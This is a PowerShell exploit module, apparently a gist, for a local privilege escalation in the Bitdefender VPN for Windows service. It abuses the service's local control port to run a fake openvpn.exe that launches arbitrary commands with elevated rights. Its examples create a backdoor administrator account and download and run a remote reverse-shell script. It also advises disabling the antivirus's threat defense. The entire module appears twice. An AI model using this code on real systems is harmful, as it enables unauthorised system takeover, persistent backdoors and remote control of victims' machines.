ykoster/Invoke-ExploitBdVpnLpe.psm1

## Invoke-ExploitBdVpnLpe.psm1
<#
    .Synopsis
    Exploit module for Bitdefender VPN for Windows

    .Parameter Command
    Command(s) to be executed when openvpn.exe is started

    .Example
    Import-Module .\Invoke-ExploitBdVpnLpe.psm1
    Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
    Invoke-ExploitBdVpnLpe -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"

    Note: this proof of concept may be blocked by Bitdefender Advanced Threat Defense, disable if needed
#>
Function Invoke-ExploitBdVpnLpe {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
    If($(Get-Service -Name AfVpnService -ErrorAction Stop).Status -ne [System.ServiceProcess.ServiceControllerStatus]::Running) {
        & "$env:ProgramFiles\Bitdefender\Bitdefender VPN\bdvpnuiapp.exe" "/show"
        Write-Error "AfVpnService is not running, enable it by manually connecting to the VPN service"
        Return
    }

    Function Send-Command {
    Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
	    [Parameter(Position = 1, Mandatory = $false)] [hashtable]$Params = @{},
	    [Parameter(Position = 2, Mandatory = $false)] [string]$Ip = "127.0.0.1",
	    [Parameter(Position = 3, Mandatory = $false)] [int]$Port = 31337)

        $End = New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse($Ip)), ([int]$Port)
        $Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
        $Stype = [System.Net.Sockets.SocketType]::Stream
        $Ptype = [System.Net.Sockets.ProtocolType]::TCP

        $Params.Add("command", $Command)
        $Data = [System.Text.Encoding]::UTF8.GetBytes($(ConvertTo-Json -InputObject $Params))

        $Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype
        $Sock.Connect($End)
        $null = $Sock.Send($Data)
        $Buffer = New-Object byte[](1024)
        $Length = $Sock.Receive($Buffer)
        $Sock.Close()

        Return ConvertFrom-Json -InputObject $([System.Text.Encoding]::UTF8.GetString($Buffer,0 , $Length))
    }

    Function Check-Vpn {
    Param([Parameter(Position = 0, Mandatory = $false)] [string]$Ip = "127.0.0.1",
	    [Parameter(Position = 1, Mandatory = $false)] [int]$Port = 31337)
        Try {
            Return $(Send-Command -Command "check" -Ip $Ip -Port $Port).isSuccess
        } Catch {
            Return $false
        }
    }

    Function Connect-Vpn {
    Param([Parameter(Position = 0, Mandatory = $false)] [string]$RemoteIp = "127.0.0.1",
        [Parameter(Position = 1, Mandatory = $false)] [string]$RemotePort = "",
        [Parameter(Position = 2, Mandatory = $false)] [string]$Protocol = "udp",
        [Parameter(Position = 3, Mandatory = $false)] [string]$VpnExecutablePath = "$env:ProgramFiles\Bitdefender\Bitdefender VPN\AfVpnService",
        [Parameter(Position = 4, Mandatory = $false)] [string]$AuthFilename = "deadebeefdeadebeefdeadebeefdeade.txt",
        [Parameter(Position = 5, Mandatory = $false)] [bool]$EnableLog = $true,
        [Parameter(Position = 6, Mandatory = $false)] [string]$Ip = "127.0.0.1",
	    [Parameter(Position = 7, Mandatory = $false)] [int]$Port = 31337)

        $Params = @{
            vpnExecutablePath = $VpnExecutablePath
            ip = $RemoteIp
            port = $RemotePort
            protocol = $Protocol
            authFilename = $AuthFilename
            enableLog = $EnableLog
        }

        Return $(Send-Command -Command "connect" -Params $Params -Ip $Ip -Port $Port)
    }

    Function Disconnect-Vpn {
    Param([Parameter(Position = 0, Mandatory = $false)] [string]$Ip = "127.0.0.1",
	    [Parameter(Position = 1, Mandatory = $false)] [int]$Port = 31337)
        Return $(Send-Command -Command "disconnect" -Ip $Ip -Port $Port).isSuccess
    }

    $tmpfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
    New-Item -Type directory -Path "$tmpfolder" | Out-Null
    Set-Content "$tmpfolder\payload.bat" -Encoding ASCII $Command
    Set-Content "$tmpfolder\openvpn.cs" -Encoding ASCII  "
class Program
{
    static void Main()
    {
        try {
            System.Diagnostics.Process.Start(`"$($tmpfolder.Replace("\", "\\"))\\payload.bat`");
        } catch(System.Exception) { }
    }
}
"
    & "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())csc.exe" "/out:$tmpfolder\openvpn.exe" "$tmpfolder\openvpn.cs"
    & "$env:ProgramFiles\Bitdefender\Bitdefender VPN\BdVpnApp.exe" "/exit"

    $tcpservice = Get-NetTCPConnection -State Listen -OwningProcess $(Get-Process -Name VpnService -ErrorAction Stop).Id
    If (Check-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort) {
        Disconnect-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort | Out-Null
        If(Connect-Vpn -VpnExecutablePath $tmpfolder -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort) {
            Start-Sleep 5
            Disconnect-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort | Out-Null
        }
    }

    # clean up
    Remove-Item $tmpfolder -Force -Recurse
}

Export-ModuleMember -Function Invoke-ExploitBdVpnLpe
	<#
	.Synopsis
	Exploit module for Bitdefender VPN for Windows

	.Parameter Command
	Command(s) to be executed when openvpn.exe is started

	.Example
	Import-Module .\Invoke-ExploitBdVpnLpe.psm1
	Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
	Invoke-ExploitBdVpnLpe -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"

	Note: this proof of concept may be blocked by Bitdefender Advanced Threat Defense, disable if needed
	#>
	Function Invoke-ExploitBdVpnLpe {
	Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
	If($(Get-Service -Name AfVpnService -ErrorAction Stop).Status -ne [System.ServiceProcess.ServiceControllerStatus]::Running) {
	& "$env:ProgramFiles\Bitdefender\Bitdefender VPN\bdvpnuiapp.exe" "/show"
	Write-Error "AfVpnService is not running, enable it by manually connecting to the VPN service"
	Return
	}

	Function Send-Command {
	Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
	[Parameter(Position = 1, Mandatory = $false)] [hashtable]$Params = @{},
	[Parameter(Position = 2, Mandatory = $false)] [string]$Ip = "127.0.0.1",
	[Parameter(Position = 3, Mandatory = $false)] [int]$Port = 31337)

	$End = New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse($Ip)), ([int]$Port)
	$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
	$Stype = [System.Net.Sockets.SocketType]::Stream
	$Ptype = [System.Net.Sockets.ProtocolType]::TCP

	$Params.Add("command", $Command)
	$Data = [System.Text.Encoding]::UTF8.GetBytes($(ConvertTo-Json -InputObject $Params))

	$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype
	$Sock.Connect($End)
	$null = $Sock.Send($Data)
	$Buffer = New-Object byte[](1024)
	$Length = $Sock.Receive($Buffer)
	$Sock.Close()

	Return ConvertFrom-Json -InputObject $([System.Text.Encoding]::UTF8.GetString($Buffer,0 , $Length))
	}

	Function Check-Vpn {
	Param([Parameter(Position = 0, Mandatory = $false)] [string]$Ip = "127.0.0.1",
	[Parameter(Position = 1, Mandatory = $false)] [int]$Port = 31337)
	Try {
	Return $(Send-Command -Command "check" -Ip $Ip -Port $Port).isSuccess
	} Catch {
	Return $false
	}
	}

	Function Connect-Vpn {
	Param([Parameter(Position = 0, Mandatory = $false)] [string]$RemoteIp = "127.0.0.1",
	[Parameter(Position = 1, Mandatory = $false)] [string]$RemotePort = "",
	[Parameter(Position = 2, Mandatory = $false)] [string]$Protocol = "udp",
	[Parameter(Position = 3, Mandatory = $false)] [string]$VpnExecutablePath = "$env:ProgramFiles\Bitdefender\Bitdefender VPN\AfVpnService",
	[Parameter(Position = 4, Mandatory = $false)] [string]$AuthFilename = "deadebeefdeadebeefdeadebeefdeade.txt",
	[Parameter(Position = 5, Mandatory = $false)] [bool]$EnableLog = $true,
	[Parameter(Position = 6, Mandatory = $false)] [string]$Ip = "127.0.0.1",
	[Parameter(Position = 7, Mandatory = $false)] [int]$Port = 31337)

	$Params = @{
	vpnExecutablePath = $VpnExecutablePath
	ip = $RemoteIp
	port = $RemotePort
	protocol = $Protocol
	authFilename = $AuthFilename
	enableLog = $EnableLog
	}

	Return $(Send-Command -Command "connect" -Params $Params -Ip $Ip -Port $Port)
	}

	Function Disconnect-Vpn {
	Param([Parameter(Position = 0, Mandatory = $false)] [string]$Ip = "127.0.0.1",
	[Parameter(Position = 1, Mandatory = $false)] [int]$Port = 31337)
	Return $(Send-Command -Command "disconnect" -Ip $Ip -Port $Port).isSuccess
	}

	$tmpfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
	New-Item -Type directory -Path "$tmpfolder" \| Out-Null
	Set-Content "$tmpfolder\payload.bat" -Encoding ASCII $Command
	Set-Content "$tmpfolder\openvpn.cs" -Encoding ASCII "
	class Program
	{
	static void Main()
	{
	try {
	System.Diagnostics.Process.Start(`"$($tmpfolder.Replace("\", "\\"))\\payload.bat`");
	} catch(System.Exception) { }
	}
	}
	"
	& "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())csc.exe" "/out:$tmpfolder\openvpn.exe" "$tmpfolder\openvpn.cs"
	& "$env:ProgramFiles\Bitdefender\Bitdefender VPN\BdVpnApp.exe" "/exit"

	$tcpservice = Get-NetTCPConnection -State Listen -OwningProcess $(Get-Process -Name VpnService -ErrorAction Stop).Id
	If (Check-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort) {
	Disconnect-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort \| Out-Null
	If(Connect-Vpn -VpnExecutablePath $tmpfolder -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort) {
	Start-Sleep 5
	Disconnect-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort \| Out-Null
	}
	}

	# clean up
	Remove-Item $tmpfolder -Force -Recurse
	}

	Export-ModuleMember -Function Invoke-ExploitBdVpnLpe